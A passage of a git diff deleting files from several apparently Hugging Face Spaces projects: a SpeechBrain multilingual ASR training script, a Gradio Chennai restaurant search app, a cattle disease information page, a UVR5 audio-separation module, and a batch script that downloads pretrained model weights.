sb.dataio.encoder.CTCTextEncoder() - - # 3. Define text pipeline: - @sb.utils.data_pipeline.takes("wrd") - @sb.utils.data_pipeline.provides( - "wrd", "char_list", "tokens_list", "tokens" - ) - def text_pipeline(wrd): - yield wrd - char_list = list(wrd) - yield char_list - tokens_list = label_encoder.encode_sequence(char_list) - yield tokens_list - tokens = torch.LongTensor(tokens_list) - yield tokens - - sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) - lab_enc_file = os.path.join(hparams["save_folder"], "label_encoder.txt") - special_labels = { - "blank_label": hparams["blank_index"], - "unk_label": hparams["unk_index"] - } - label_encoder.load_or_create( - path=lab_enc_file, - from_didatasets=[train_data], - output_key="char_list", - special_labels=special_labels, - sequence_input=True, - ) - - # 4. Set output: - sb.dataio.dataset.set_output_keys( - datasets, ["id", "sig", "wrd", "char_list", "tokens"], - ) - return train_data, valid_data,test_datasets, label_encoder - -class ASR(sb.core.Brain): - def compute_forward(self, batch, stage): - """Forward computations from the waveform batches to the output probabilities.""" - - batch = batch.to(self.device) - wavs, wav_lens = batch.sig - wavs, wav_lens = wavs.to(self.device), wav_lens.to(self.device) - - if stage == sb.Stage.TRAIN: - if hasattr(self.hparams, "augmentation"): - wavs = self.hparams.augmentation(wavs, wav_lens) - - # Forward pass - feats = self.modules.wav2vec2(wavs, wav_lens) - x = self.modules.enc(feats) - logits = self.modules.ctc_lin(x) - p_ctc = self.hparams.log_softmax(logits) - - return p_ctc, wav_lens - - def custom_encode(self,wavs,wav_lens) : - wavs = wavs.to(self.device) - if(wav_lens is not None): wav_lens.to(self.device) - - feats = self.modules.wav2vec2(wavs, wav_lens) - x = self.modules.enc(feats) - logits = self.modules.ctc_lin(x) - p_ctc = self.hparams.log_softmax(logits) - - return feats,p_ctc - - - - def compute_objectives(self, predictions, batch, stage): - """Computes the loss (CTC) given predictions and targets.""" - - p_ctc, wav_lens = predictions - - ids = batch.id - tokens, tokens_lens = batch.tokens - - loss = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) - - if stage != sb.Stage.TRAIN: - predicted_tokens = sb.decoders.ctc_greedy_decode( - p_ctc, wav_lens, blank_id=self.hparams.blank_index - ) - # Decode token terms to words - if self.hparams.use_language_modelling: - predicted_words = [] - for logs in p_ctc: - text = decoder.decode(logs.detach().cpu().numpy()) - predicted_words.append(text.split(" ")) - else: - predicted_words = [ - "".join(self.tokenizer.decode_ndim(utt_seq)).split(" ") - for utt_seq in predicted_tokens - ] - # Convert indices to words - target_words = [wrd.split(" ") for wrd in batch.wrd] - - self.wer_metric.append(ids, predicted_words, target_words) - self.cer_metric.append(ids, predicted_words, target_words) - - return loss - - def fit_batch(self, batch): - """Train the parameters given a single batch in input""" - should_step = self.step % self.grad_accumulation_factor == 0 - # Managing automatic mixed precision - # TOFIX: CTC fine-tuning currently is unstable - # This is certainly due to CTC being done in fp16 instead of fp32 - if self.auto_mix_prec: - with torch.cuda.amp.autocast(): - with self.no_sync(): - outputs = self.compute_forward(batch, sb.Stage.TRAIN) - loss = self.compute_objectives(outputs, batch, sb.Stage.TRAIN) - with self.no_sync(not should_step): - self.scaler.scale( - loss / self.grad_accumulation_factor - ).backward() - if should_step: - - if not self.hparams.wav2vec2.freeze: - self.scaler.unscale_(self.wav2vec_optimizer) - self.scaler.unscale_(self.model_optimizer) - if self.check_gradients(loss): - if not self.hparams.wav2vec2.freeze: - if self.optimizer_step >= self.hparams.warmup_steps: - self.scaler.step(self.wav2vec_optimizer) - self.scaler.step(self.model_optimizer) - self.scaler.update() - self.zero_grad() - self.optimizer_step += 1 - else: - # This is mandatory because HF models have a weird behavior with DDP - # on the forward pass - with self.no_sync(): - outputs = self.compute_forward(batch, sb.Stage.TRAIN) - - loss = self.compute_objectives(outputs, batch, sb.Stage.TRAIN) - - with self.no_sync(not should_step): - (loss / self.grad_accumulation_factor).backward() - if should_step: - if self.check_gradients(loss): - if not self.hparams.wav2vec2.freeze: - if self.optimizer_step >= self.hparams.warmup_steps: - self.wav2vec_optimizer.step() - self.model_optimizer.step() - self.zero_grad() - self.optimizer_step += 1 - - self.on_fit_batch_end(batch, outputs, loss, should_step) - return loss.detach().cpu() - - def evaluate_batch(self, batch, stage): - """Computations needed for validation/test batches""" - predictions = self.compute_forward(batch, stage=stage) - with torch.no_grad(): - loss = self.compute_objectives(predictions, batch, stage=stage) - return loss.detach() - - def on_stage_start(self, stage, epoch): - """Gets called at the beginning of each epoch""" - if stage != sb.Stage.TRAIN: - self.cer_metric = self.hparams.cer_computer() - self.wer_metric = self.hparams.error_rate_computer() - - def on_stage_end(self, stage, stage_loss, epoch): - """Gets called at the end of an epoch.""" - # Compute/store important stats - stage_stats = {"loss": stage_loss} - if stage == sb.Stage.TRAIN: - self.train_stats = stage_stats - else: - stage_stats["CER"] = self.cer_metric.summarize("error_rate") - stage_stats["WER"] = self.wer_metric.summarize("error_rate") - - # Perform end-of-iteration things, like annealing, logging, etc. - if stage == sb.Stage.VALID: - old_lr_model, new_lr_model = self.hparams.lr_annealing_model( - stage_stats["loss"] - ) - old_lr_wav2vec, new_lr_wav2vec = self.hparams.lr_annealing_wav2vec( - stage_stats["loss"] - ) - sb.nnet.schedulers.update_learning_rate( - self.model_optimizer, new_lr_model - ) - if not self.hparams.wav2vec2.freeze: - sb.nnet.schedulers.update_learning_rate( - self.wav2vec_optimizer, new_lr_wav2vec - ) - self.hparams.train_logger.log_stats( - stats_meta={ - "epoch": epoch, - "lr_model": old_lr_model, - "lr_wav2vec": old_lr_wav2vec, - }, - train_stats=self.train_stats, - valid_stats=stage_stats, - ) - self.checkpointer.save_and_keep_only( - meta={"WER": stage_stats["WER"]}, min_keys=["WER"], - ) - elif stage == sb.Stage.TEST: - self.hparams.train_logger.log_stats( - stats_meta={"Epoch loaded": self.hparams.epoch_counter.current}, - test_stats=stage_stats, - ) - with open(self.hparams.wer_file, "w") as w: - self.wer_metric.write_stats(w) - - def init_optimizers(self): - "Initializes the wav2vec2 optimizer and model optimizer" - - # If the wav2vec encoder is unfrozen, we create the optimizer - if not self.hparams.wav2vec2.freeze: - self.wav2vec_optimizer = self.hparams.wav2vec_opt_class( - self.modules.wav2vec2.parameters() - ) - if self.checkpointer is not None: - self.checkpointer.add_recoverable( - "wav2vec_opt", self.wav2vec_optimizer - ) - - self.model_optimizer = self.hparams.model_opt_class( - self.hparams.model.parameters() - ) - - if self.checkpointer is not None: - self.checkpointer.add_recoverable("modelopt", self.model_optimizer) - - def zero_grad(self, set_to_none=False): - if not self.hparams.wav2vec2.freeze: - self.wav2vec_optimizer.zero_grad(set_to_none) - self.model_optimizer.zero_grad(set_to_none) - - -from speechbrain.pretrained import EncoderASR,EncoderDecoderASR -french_asr_model = EncoderASR.from_hparams(source="speechbrain/asr-wav2vec2-commonvoice-fr", savedir="pretrained_models/asr-wav2vec2-commonvoice-fr").cuda() - -cvhparams_file, cvrun_opts, cvoverrides = sb.parse_arguments(["en_cv.yaml"]) -with open(cvhparams_file) as cvfin: - cvhparams = load_hyperpyyaml(cvfin, cvoverrides) -english_asr_model = ASRCV( - modules=cvhparams["modules"], - hparams=cvhparams, - run_opts=cvrun_opts, - checkpointer=cvhparams["checkpointer"], - ) -english_asr_model.checkpointer.recover_if_possible() -asr_brain = ASR( - modules=hparams["modules"], - hparams=hparams, - run_opts=run_opts, - checkpointer=hparams["checkpointer"], -) -asr_brain.checkpointer.recover_if_possible() -asr_brain.modules.eval() -english_asr_model.modules.eval() -french_asr_model.mods.eval() - -# Commented out IPython magic to ensure Python compatibility. -# %ls - -#UTILS FUNCTIOJNS -def get_size_dimensions(arr): - size_dimensions = [] - while isinstance(arr, list): - size_dimensions.append(len(arr)) - arr = arr[0] - return size_dimensions - -def scale_array(batch,n): - scaled_batch = [] - - for array in batch: - if(n < len(array)): raise ValueError("Cannot scale Array down") - - repeat = round(n/len(array))+1 - scaled_length_array= [] - - for i in array: - for j in range(repeat) : - if(len(scaled_length_array) == n): break - scaled_length_array.append(i) - - scaled_batch.append(scaled_length_array) - - return torch.tensor(scaled_batch) - - -def load_paths(wavs_path): - waveforms = [] - for path in wavs_path : - waveform, _ = torchaudio.load(path) - waveforms.append(waveform.squeeze(0)) - # normalize array length to the bigger arrays by pading with 0's - padded_arrays = pad_sequence(waveforms, batch_first=True) - return torch.tensor(padded_arrays) - - - -device = 'cuda' -verbose = 0 -#FLOW LEVEL FUNCTIONS -def merge_strategy(embeddings1, embeddings2, embeddings3,post1, post2,post3): - - - post1 = post1.to(device) - post2 = post2.to(device) - post3 = post3.to(device) - embeddings1 = embeddings1.to(device) - embeddings2 = embeddings2.to(device) - embeddings3 = embeddings3.to(device) - - posteriograms_merged = torch.cat((post1,post2,post3),dim=2) - embeddings_merged = torch.cat((embeddings1,embeddings2,embeddings3),dim=2) - - if(verbose !=0): - print('MERGED POST ',posteriograms_merged.shape) - print('MERGED emb ',embeddings_merged.shape) - - return torch.cat((posteriograms_merged,embeddings_merged),dim=2).to(device) - -def decode(model,wavs,wav_lens): - - with torch.no_grad(): - wav_lens = wav_lens.to(model.device) - encoder_out = model.encode_batch(wavs, wav_lens) - predictions = model.decoding_function(encoder_out, wav_lens) - return predictions - -def middle_layer(batch, lens): - - tn_embeddings, tn_posteriogram = asr_brain.custom_encode(batch,None) - - fr_embeddings = french_asr_model.mods.encoder.wav2vec2(batch) - fr_posteriogram =french_asr_model.encode_batch(batch,lens) - en_embeddings = english_asr_model.modules.wav2vec2(batch, lens) - x = english_asr_model.modules.enc(en_embeddings) - en_posteriogram = english_asr_model.modules.ctc_lin(x) - #scores, en_posteriogram = english_asr_model.mods.decoder(en_embeddings ,lens) - if(verbose !=0): - print('[EMBEDDINGS] FR:',fr_embeddings.shape, "EN:",en_embeddings.shape, "TN:", tn_embeddings.shape) - print('[POSTERIOGRAM] FR:',fr_posteriogram.shape, "EN:",en_posteriogram.shape,"TN:",tn_posteriogram.shape) - - - bilangual_sample = merge_strategy(fr_embeddings,en_embeddings,tn_embeddings,fr_posteriogram,en_posteriogram,tn_posteriogram) - return bilangual_sample - -class Mixer(sb.core.Brain): - - def compute_forward(self, batch, stage): - """Forward computations from the waveform batches to the output probabilities.""" - wavs, wav_lens = batch.sig - wavs, wav_lens = wavs.to(self.device), wav_lens.to(self.device) - - if stage == sb.Stage.TRAIN: - if hasattr(self.hparams, "augmentation"): - wavs = self.hparams.augmentation(wavs, wav_lens) - - multi_langual_feats = middle_layer(wavs, wav_lens) - multi_langual_feats= multi_langual_feats.to(device) - feats, _ = self.modules.enc(multi_langual_feats) - logits = self.modules.ctc_lin(feats) - p_ctc = self.hparams.log_softmax(logits) - - if stage!= sb.Stage.TRAIN: - p_tokens = sb.decoders.ctc_greedy_decode( - p_ctc, wav_lens, blank_id=self.hparams.blank_index - ) - else : - p_tokens = None - return p_ctc, wav_lens, p_tokens - - def compute_objectives(self, predictions, batch, stage): - """Computes the loss (CTC) given predictions and targets.""" - - p_ctc, wav_lens , predicted_tokens= predictions - - ids = batch.id - tokens, tokens_lens = batch.tokens - - loss = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) - - - if stage == sb.Stage.VALID: - predicted_words = [ - "".join(self.tokenizer.decode_ndim(utt_seq)).split(" ") - for utt_seq in predicted_tokens - ] - target_words = [wrd.split(" ") for wrd in batch.wrd] - self.wer_metric.append(ids, predicted_words, target_words) - self.cer_metric.append(ids, predicted_words, target_words) - if stage ==sb.Stage.TEST : - if self.hparams.language_modelling: - predicted_words = [] - for logs in p_ctc: - text = decoder.decode(logs.detach().cpu().numpy()) - predicted_words.append(text.split(" ")) - else : - predicted_words = [ - "".join(self.tokenizer.decode_ndim(utt_seq)).split(" ") - for utt_seq in predicted_tokens - ] - - target_words = [wrd.split(" ") for wrd in batch.wrd] - self.wer_metric.append(ids, predicted_words, target_words) - self.cer_metric.append(ids, predicted_words, target_words) - - return loss - - def fit_batch(self, batch): - """Train the parameters given a single batch in input""" - should_step = self.step % self.grad_accumulation_factor == 0 - # Managing automatic mixed precision - # TOFIX: CTC fine-tuning currently is unstable - # This is certainly due to CTC being done in fp16 instead of fp32 - if self.auto_mix_prec: - with torch.cuda.amp.autocast(): - with self.no_sync(): - outputs = self.compute_forward(batch, sb.Stage.TRAIN) - loss = self.compute_objectives(outputs, batch, sb.Stage.TRAIN) - with self.no_sync(not should_step): - self.scaler.scale( - loss / self.grad_accumulation_factor - ).backward() - if should_step: - - - self.scaler.unscale_(self.model_optimizer) - if self.check_gradients(loss): - self.scaler.step(self.model_optimizer) - self.scaler.update() - self.zero_grad() - self.optimizer_step += 1 - else: - # This is mandatory because HF models have a weird behavior with DDP - # on the forward pass - with self.no_sync(): - outputs = self.compute_forward(batch, sb.Stage.TRAIN) - - loss = self.compute_objectives(outputs, batch, sb.Stage.TRAIN) - - with self.no_sync(not should_step): - (loss / self.grad_accumulation_factor).backward() - if should_step: - if self.check_gradients(loss): - self.model_optimizer.step() - self.zero_grad() - self.optimizer_step += 1 - - self.on_fit_batch_end(batch, outputs, loss, should_step) - return loss.detach().cpu() - - def evaluate_batch(self, batch, stage): - """Computations needed for validation/test batches""" - predictions = self.compute_forward(batch, stage=stage) - with torch.no_grad(): - loss = self.compute_objectives(predictions, batch, stage=stage) - return loss.detach() - - def on_stage_start(self, stage, epoch): - """Gets called at the beginning of each epoch""" - if stage != sb.Stage.TRAIN: - self.cer_metric = self.hparams.cer_computer() - self.wer_metric = self.hparams.error_rate_computer() - - def on_stage_end(self, stage, stage_loss, epoch): - """Gets called at the end of an epoch.""" - # Compute/store important stats - stage_stats = {"loss": stage_loss} - if stage == sb.Stage.TRAIN: - self.train_stats = stage_stats - else: - stage_stats["CER"] = self.cer_metric.summarize("error_rate") - stage_stats["WER"] = self.wer_metric.summarize("error_rate") - - # Perform end-of-iteration things, like annealing, logging, etc. - if stage == sb.Stage.VALID: - old_lr_model, new_lr_model = self.hparams.lr_annealing_model( - stage_stats["loss"] - ) - sb.nnet.schedulers.update_learning_rate( - self.model_optimizer, new_lr_model - ) - self.hparams.train_logger.log_stats( - stats_meta={ - "epoch": epoch, - "lr_model": old_lr_model, - }, - train_stats=self.train_stats, - valid_stats=stage_stats, - ) - self.checkpointer.save_and_keep_only( - meta={"WER": stage_stats["WER"]}, min_keys=["WER"], - ) - elif stage == sb.Stage.TEST: - self.hparams.train_logger.log_stats( - stats_meta={"Epoch loaded": self.hparams.epoch_counter.current}, - test_stats=stage_stats, - ) - with open(self.hparams.wer_file, "w") as w: - self.wer_metric.write_stats(w) - - def init_optimizers(self): - - self.model_optimizer = self.hparams.model_opt_class( - self.hparams.model.parameters() - ) - - if self.checkpointer is not None: - self.checkpointer.add_recoverable("modelopt", self.model_optimizer) - - def zero_grad(self, set_to_none=False): - - self.model_optimizer.zero_grad(set_to_none) - - -hparams_file, run_opts, overrides = sb.parse_arguments(sys.argv[1:]) - -# If distributed_launch=True then -# create ddp_group with the right communication protocol -sb.utils.distributed.ddp_init_group(run_opts) - -with open(hparams_file) as fin: - hparams = load_hyperpyyaml(fin, overrides) - -# Create experiment directory -sb.create_experiment_directory( - experiment_directory=hparams["output_folder"], - hyperparams_to_save=hparams_file, - overrides=overrides, -) -def read_labels_file(labels_file): - with open(labels_file, "r",encoding="utf-8") as lf: - lines = lf.read().splitlines() - division = "===" - numbers = {} - for line in lines : - if division in line : - break - string, number = line.split("=>") - number = int(number) - string = string[1:-2] - numbers[number] = string - return [numbers[x] for x in range(len(numbers))] -train_data, valid_data, test_datasets, label_encoder = dataio_prepare( - hparams - ) - - -labels = read_labels_file(os.path.join(hparams["save_folder"], "label_encoder.txt")) -labels = [""] + labels[1:-1] + ["1"] -if hparams["language_modelling"]: - decoder = build_ctcdecoder( - labels, - kenlm_model_path=hparams["ngram_lm_path"], # either .arpa or .bin file - alpha=0.5, # tuned on a val set - beta=1, # tuned on a val set - ) - - - - -mixer = Mixer( - modules=hparams["modules"], - hparams=hparams, - run_opts=run_opts, - checkpointer=hparams["checkpointer"], -) -mixer.tokenizer = label_encoder - - -mixer.fit( - mixer.hparams.epoch_counter, - train_data, - valid_data, - train_loader_kwargs=hparams["dataloader_options"], - valid_loader_kwargs=hparams["test_dataloader_options"], -) -print(test_datasets.keys()) -for k in test_datasets.keys(): # keys are test_clean, test_other etc - mixer.hparams.wer_file = os.path.join( - hparams["output_folder"], "wer_{}.txt".format(k) - ) - mixer.evaluate( - test_datasets[k], test_loader_kwargs=hparams["test_dataloader_options"] - ) - diff --git a/spaces/Sardor-Odil/StableDiffusion/app.py b/spaces/Sardor-Odil/StableDiffusion/app.py deleted file mode 100644 index 155c781153e7732740eafd5360d20dfa4f5c3421..0000000000000000000000000000000000000000 --- a/spaces/Sardor-Odil/StableDiffusion/app.py +++ /dev/null @@ -1,83 +0,0 @@ -import gradio as gr -import pandas as pd -import numpy as np - -import warnings - -warnings.filterwarnings('ignore') - -url = 'https://raw.githubusercontent.com/ArushiS12/gradio-heroku/main/Zomato-Chennai.csv' -data = pd.read_csv(url) - - -def cuisine(Cuisine, Area): - l = [Cuisine] - x = data['Cuisine'].str.contains('|'.join(l)) - data['Flag'] = np.where(x, 'Yes', 'No') - df = data.loc[data['Flag'] == 'Yes'] - if Area: - df1 = df[df['Area'] == Area] - final1 = df1.drop('Flag', axis=1) - return final1 - else: - final = df.drop('Flag', axis=1) - return final - - -cuisine_options = ['American', 'Andhra', 'Arabian', 'Asian', 'Bakery', 'Bar Food', 'BBQ', 'Beverages', 'Biryani', - 'Bubble Tea', 'Burger', 'Burmese', 'Cafe', 'Charcoal Chicken', 'Chettinad', 'Chinese', 'Coffee', - 'Continental', 'Desserts', 'Drinks Only', 'European', 'Fast Food', 'Finger Food', 'French', - 'Gujarati', 'Healthy Food', 'Hyderabadi', 'Ice Cream', 'Irish', 'Italian', 'Japanese', 'Juices', - 'Kebab', 'Kerala', 'Konkan', 'Korean', 'Lebanese', 'Malaysian', 'Mangalorean', 'Mediterranean', - 'Mexican', 'Middle Eastern', 'Mithai', 'Modern Indian', 'Momos', 'Mughlai', 'North Indian', - 'Oriental', 'Pancake', 'Pasta', 'Pizza', 'Rajasthani', 'Rolls', 'Salad', 'Sandwich', 'Seafood', - 'Shake', 'Sichuan', 'Singaporean', 'South Indian', 'Spanish', 'Steak', 'Street Food', 'Sushi', - 'Tamil', 'Tea', 'Tex-Mex', 'Thai', 'Tibetan', 'Turkish', 'Vietnamese', 'Waffle', 'Wraps'] -area_options = ['Abhiramapuram', 'Adyar', 'Akkarai', 'Alandur', 'Alwarpet', 'Ambattur', - 'Ampa Skywalk Mall Aminijikarai', 'Anna Nagar East', 'Anna Nagar West', 'Anna Salai', 'Arumbakkam', - 'Ashok Nagar', 'Avadi', 'Besant Nagar', 'Chetpet', 'Choolaimed', 'Chromepet', 'Citadines', - 'Courtyard by Marriott Teynampet', 'Crowne Plaza Adyar Park Alwarpet', 'E Hotel Royapettah', 'Egatoor', - 'Egmore', 'Ekkaduthangal', 'Feathers A Radha Hotel', 'Foodies Kitchen', 'Forum Vijaya Mall Vadapalani', - 'George Town', 'Gopalapuram', 'Grand by GRT Hotels', 'Green Park Hotel Vadapalani', 'GST Road', - 'Guindy', 'Hablis Hotel Guindy', 'Hilton Guindy', 'Holiday Inn OMR IT Expressway', - 'Hotel Abu Palace Egmore', 'Hotel Maris Gopalapuram', 'Hotel Palmgrove Nungambakkam', - 'Hotel Park Elanza Nungambakkam', 'Hotel Rajpark Alwarpet', 'Hyatt Regency Teynampet', 'IBIS OMR', - 'Injambakkam', 'Ispahani Centre Nungambakkam', - 'InterContinental Mahabalipuram Resort East Coast Road (ECR)', 'ITC Grand Chola Guindy', - 'Jaag Hotels T.Nagar', 'K.K. Nagar', 'Kanathur', 'Karapakkam', 'Kilpauk', - 'Kipling East Coast Road (ECR)', 'Kodambakkam', 'Kolathur', 'Kotturpuram', 'Kovalam', - 'Lemon Tree Hotel Guindy', 'Madipakkam', 'Maduravoyal', 'Mahabalipuram', 'Mandaveli', 'Medavakkam', - 'Meenambakkam', 'Mogappair', 'MRC Nagar', 'Muttukadu', 'Mylapore', 'Nandanam', 'Navallur', - 'Neelangarai', 'New Woodlands Hotel Mylapore', 'Novotel Nandanam', 'Novotel OMR', 'Nungambakkam', - 'Okkiyampet', 'Old Mahabalipuram Road (OMR)', 'OMR Food Street Kandanchavadi', 'Paati Veedu T.Nagar', - 'Palavakkam', 'Pallikaranai', 'Perambur', 'Perungudi', 'Phoenix Market City Velachery', 'Poonamalle', - 'Porur', 'Potheri', 'Purasavakkam', 'RA Puram', 'Radisson Blu Egmore', - 'Radisson Blu Temple Bay Mamallapuram', 'Ramada Plaza Guindy', 'Ramapuram', 'Royapettah', 'Saidapet', - 'Saligramam', 'Selaiyur', 'Semmancheri', 'Sheraton Grand Neelangarai', 'Sholinganallur', - 'Somerset Greenways', 'St. Thomas Mount', 'T. Nagar', 'Taj Club House Thousand Lights', - 'Taj Coromandel Nungambakkam', "Taj Fisherman's Cove Resort & Spa Kanchipuram District", 'Tambaram', - 'Taramani', 'Teynampet', 'The Accord Metropolitan T. Nagar', "The King's Hotel Egmore", - 'The Leela Palace MRC Nagar', 'The Park Nungambakkam', 'The Raintree Alwarpet', - 'The Residency T. Nagar', 'The Residency Towers T. Nagar', 'The Savara Hotel RK Salai (Cathedral Road)', - 'The Westin Velachery', 'Thiruvanmiyur', 'Thousand Lights', 'Thuraipakkam', 'Tiruvottiyur', - 'Triplicane', 'Turyaa', 'Vadapalani', 'Valasaravakkam', 'Velachery', 'Vepery', 'Virugambakkam', - 'VR Mall Anna Nagar', 'Washermenpet', 'West Mambalam', 'Zone by The Park Pallikaranai'] - -with gr.Blocks() as demo: - gr.Markdown("

      Dine-out Restaurants in Chennai

      ") - gr.Markdown('

      Search for your nearby restaurants.

      ') - - with gr.Row(): - name = gr.Dropdown(cuisine_options, label="Cuisine") - name1 = gr.Dropdown(area_options, label="Location") - - with gr.Row(): - submit_btn = gr.Button("Submit") - clear_btn = gr.Button("Clear") - - output = gr.DataFrame(label="Restaurants", wrap=True) - - submit_btn.click(fn=cuisine, inputs=[name, name1], outputs=output) - clear_btn.click(None, inputs=[], outputs=output, _js="() => (null)\n") - -demo.launch() \ No newline at end of file diff --git a/spaces/SarthakSidhant/Go-Cattle/diseases/enzootic bovine leukosis.md b/spaces/SarthakSidhant/Go-Cattle/diseases/enzootic bovine leukosis.md deleted file mode 100644 index f51149945818f17cf4e05fc4dd477aa9ee831899..0000000000000000000000000000000000000000 --- a/spaces/SarthakSidhant/Go-Cattle/diseases/enzootic bovine leukosis.md +++ /dev/null @@ -1,37 +0,0 @@ -## Enzootic bovine leukosis (EBL) - -**Information** - -Enzootic bovine leukosis (EBL) is a chronic, contagious disease of cattle caused by a retrovirus called bovine leukaemia virus (BLV). BLV is a cancer-causing virus that can infect cattle of all ages. - -**Symptoms** - -The symptoms of EBL can vary depending on the animal's individual immune response. Some infected cattle may show no symptoms at all, while others may develop a range of symptoms, including: - -* Weight loss -* Enlarged lymph nodes -* Anemia -* Jaundice -* Reduced milk production -* Cancerous tumors - -**Remedies** - -There is no cure for EBL. Treatment is usually supportive and may include: - -* Administering fluids and electrolytes -* Treating secondary bacterial infections -* Administering antibiotics - -**Causes** - -EBL is caused by a retrovirus called bovine leukaemia virus (BLV). BLV is a cancer-causing virus that can infect cattle of all ages. BLV is spread through contact with infected cattle's blood or milk. - -**Prevention** - -There is no vaccine available for EBL. However, there are some preventive measures that can be taken to reduce the risk of infection, such as: - -* Testing cattle for BLV infection -* Isolating infected animals from healthy animals -* Practicing good hygiene and biosecurity measures -* Vaccinating cattle against other diseases that can weaken the immune system, such as bovine viral diarrhea virus (BVDV) and rotavirus diff --git a/spaces/ServerX/PorcoDiaz/infer/modules/uvr5/modules.py b/spaces/ServerX/PorcoDiaz/infer/modules/uvr5/modules.py deleted file mode 100644 index f63ac6a794100cc95da21dcba78b23377a1f133d..0000000000000000000000000000000000000000 --- a/spaces/ServerX/PorcoDiaz/infer/modules/uvr5/modules.py +++ /dev/null @@ -1,107 +0,0 @@ -import os -import traceback -import logging - -logger = logging.getLogger(__name__) - -import ffmpeg -import torch - -from configs.config import Config -from infer.modules.uvr5.mdxnet import MDXNetDereverb -from infer.modules.uvr5.preprocess import AudioPre, AudioPreDeEcho - -config = Config() - - -def uvr(model_name, inp_root, save_root_vocal, paths, save_root_ins, agg, format0): - infos = [] - try: - inp_root = inp_root.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - save_root_vocal = ( - save_root_vocal.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - ) - save_root_ins = ( - save_root_ins.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - ) - if model_name == "onnx_dereverb_By_FoxJoy": - pre_fun = MDXNetDereverb(15, config.device) - else: - func = AudioPre if "DeEcho" not in model_name else AudioPreDeEcho - pre_fun = func( - agg=int(agg), - model_path=os.path.join( - os.getenv("weight_uvr5_root"), model_name + ".pth" - ), - device=config.device, - is_half=config.is_half, - ) - if inp_root != "": - paths = [os.path.join(inp_root, name) for name in os.listdir(inp_root)] - else: - paths = [path.name for path in paths] - for path in paths: - inp_path = os.path.join(inp_root, path) - need_reformat = 1 - done = 0 - try: - info = ffmpeg.probe(inp_path, cmd="ffprobe") - if ( - info["streams"][0]["channels"] == 2 - and info["streams"][0]["sample_rate"] == "44100" - ): - need_reformat = 0 - pre_fun._path_audio_( - inp_path, save_root_ins, save_root_vocal, format0 - ) - done = 1 - except: - need_reformat = 1 - traceback.print_exc() - if need_reformat == 1: - tmp_path = "%s/%s.reformatted.wav" % ( - os.path.join(os.environ["TEMP"]), - os.path.basename(inp_path), - ) - os.system( - "ffmpeg -i %s -vn -acodec pcm_s16le -ac 2 -ar 44100 %s -y" - % (inp_path, tmp_path) - ) - inp_path = tmp_path - try: - if done == 0: - pre_fun.path_audio( - inp_path, save_root_ins, save_root_vocal, format0 - ) - infos.append("%s->Success" % (os.path.basename(inp_path))) - yield "\n".join(infos) - except: - try: - if done == 0: - pre_fun._path_audio_( - inp_path, save_root_ins, save_root_vocal, format0 - ) - infos.append("%s->Success" % (os.path.basename(inp_path))) - yield "\n".join(infos) - except: - infos.append( - "%s->%s" % (os.path.basename(inp_path), traceback.format_exc()) - ) - yield "\n".join(infos) - except: - infos.append(traceback.format_exc()) - yield "\n".join(infos) - finally: - try: - if model_name == "onnx_dereverb_By_FoxJoy": - del pre_fun.pred.model - del pre_fun.pred.model_ - else: - del pre_fun.model - del pre_fun - except: - traceback.print_exc() - if torch.cuda.is_available(): - torch.cuda.empty_cache() - logger.info("Executed torch.cuda.empty_cache()") - yield "\n".join(infos) diff --git a/spaces/ServerX/PorcoDiaz/tools/dlmodels.bat b/spaces/ServerX/PorcoDiaz/tools/dlmodels.bat deleted file mode 100644 index 5d80f50369b1f3ed37c045d07a9e2ce8954f09d4..0000000000000000000000000000000000000000 --- a/spaces/ServerX/PorcoDiaz/tools/dlmodels.bat +++ /dev/null @@ -1,348 +0,0 @@ -@echo off && chcp 65001 - -echo working dir is %cd% -echo downloading requirement aria2 check. -echo= -dir /a:d/b | findstr "aria2" > flag.txt -findstr "aria2" flag.txt >nul -if %errorlevel% ==0 ( - echo aria2 checked. - echo= -) else ( - echo failed. please downloading aria2 from webpage! - echo unzip it and put in this directory! - timeout /T 5 - start https://github.com/aria2/aria2/releases/tag/release-1.36.0 - echo= - goto end -) - -echo envfiles checking start. -echo= - -for /f %%x in ('findstr /i /c:"aria2" "flag.txt"') do (set aria2=%%x)&goto endSch -:endSch - -set d32=f0D32k.pth -set d40=f0D40k.pth -set d48=f0D48k.pth -set g32=f0G32k.pth -set g40=f0G40k.pth -set g48=f0G48k.pth - -set d40v2=f0D40k.pth -set g40v2=f0G40k.pth - -set dld32=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0D32k.pth -set dld40=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0D40k.pth -set dld48=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0D48k.pth -set dlg32=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0G32k.pth -set dlg40=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0G40k.pth -set dlg48=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/f0G48k.pth - -set dld40v2=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained_v2/f0D40k.pth -set dlg40v2=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained_v2/f0G40k.pth - -set hp2_all=HP2_all_vocals.pth -set hp3_all=HP3_all_vocals.pth -set hp5_only=HP5_only_main_vocal.pth -set VR_DeEchoAggressive=VR-DeEchoAggressive.pth -set VR_DeEchoDeReverb=VR-DeEchoDeReverb.pth -set VR_DeEchoNormal=VR-DeEchoNormal.pth -set onnx_dereverb=vocals.onnx - -set dlhp2_all=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/HP2_all_vocals.pth -set dlhp3_all=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/HP3_all_vocals.pth -set dlhp5_only=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/HP5_only_main_vocal.pth -set dlVR_DeEchoAggressive=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/VR-DeEchoAggressive.pth -set dlVR_DeEchoDeReverb=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/VR-DeEchoDeReverb.pth -set 